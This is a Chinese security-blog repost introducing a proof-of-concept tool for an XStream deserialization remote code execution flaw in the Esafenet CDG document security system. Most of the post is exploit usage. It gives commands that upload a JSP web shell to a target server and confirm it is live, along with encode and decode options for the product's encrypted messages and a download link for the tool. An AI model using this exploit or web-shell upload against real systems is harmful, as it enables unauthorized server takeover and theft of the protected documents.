亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用PoC

admin 2024年8月10日11:18:47评论32 views字数 1594阅读5分18秒阅读模式

0x01 工具介绍

亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统存在XStream反序列化远程代码执行漏洞,攻击者可利用该漏洞对服务器上传任意文件,进而控制服务器权限。

0x02 安装与使用

一、文件上传利用
$ cat test1.jsp<%out.println("e165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43");%>$ java -jar CDGXStreamDeserRCE.jar -p http://127.0.0.1:8080 -uf test1.jsp -t https://192.168.31.190:8443[+] Exploit Successed[+] WebShell: https://192.168.31.190:8443/CDGServer3/test1.jsp$ curl -k https://192.168.31.190:8443/CDGServer3/test1.jspe165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43

二、密文解码,读取文件内容进行解码或直接对字符串进行解码。

$ java -jar CDGXStreamDeserRCE.jar -d e.txt<?xml version='1.0' encoding="gb2312"?><CDGAuthoriseTemplet><authoriseTempletList><AuthoriseTemplet><name>SystemAdmin</name><description>3FF8A0978....
$ java -jar CDGXStreamDeserRCE.jar -d FEPCCCLCENHIPOAFPAPDDFCGEAPNMDBMOJPMJAKKNPHOKIKIDCBPHEGKLDGNHCBDEIMODEKMKPFBAIMMNLOJJKMIICLAPJAAFGNGAKFBMPKPJMOIKODEJJMHJCCHKBMFMMFDLOMDPABOJCEAPOFDCPMKGDHFNBBIMCIPAMMIIANFPAJHFAABLLLANNIDAGNKOHONJGFGBKHFDMCLJIMICBHBJEIAAIMACN<?xml version='1.0' encoding="gb2312"?><SystemReturn><returnMessage>Error1200</returnMessage></SystemReturn>

三、明文编码,读取文件内容进行编码或直接对字符串进行编码。

$ java -jar CDGXStreamDeserRCE.jar -e payload.xml
$ java -jar CDGXStreamDeserRCE.jar -e "C:Program Files (x86)ESAFENETCDocGuard Servertomcat64webappsCDGServer3"BCBILAKIDOOOCGKJDBBFOCGJFGFJPNJALCHEBLGLBFAMKDDLPBCFFJCJHOPGLEACMIOHIFJAGCBPOMIKLMGBAGCNBGEGNKGALLCGLOJNJBHCLMNNGHHJJNAAKPMEDFJDGCEMDADGDCEFFCGEGNFLGHCH

0x03 下载链接

 

https://github.com/0xf4n9x/CDGXStreamDeserRCE

 

原文始发于微信公众号(网络安全者):亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用(8月9日更新)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月10日11:18:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用PoChttp://cn-sec.com/archives/3050512.html

发表评论

匿名网友 填写信息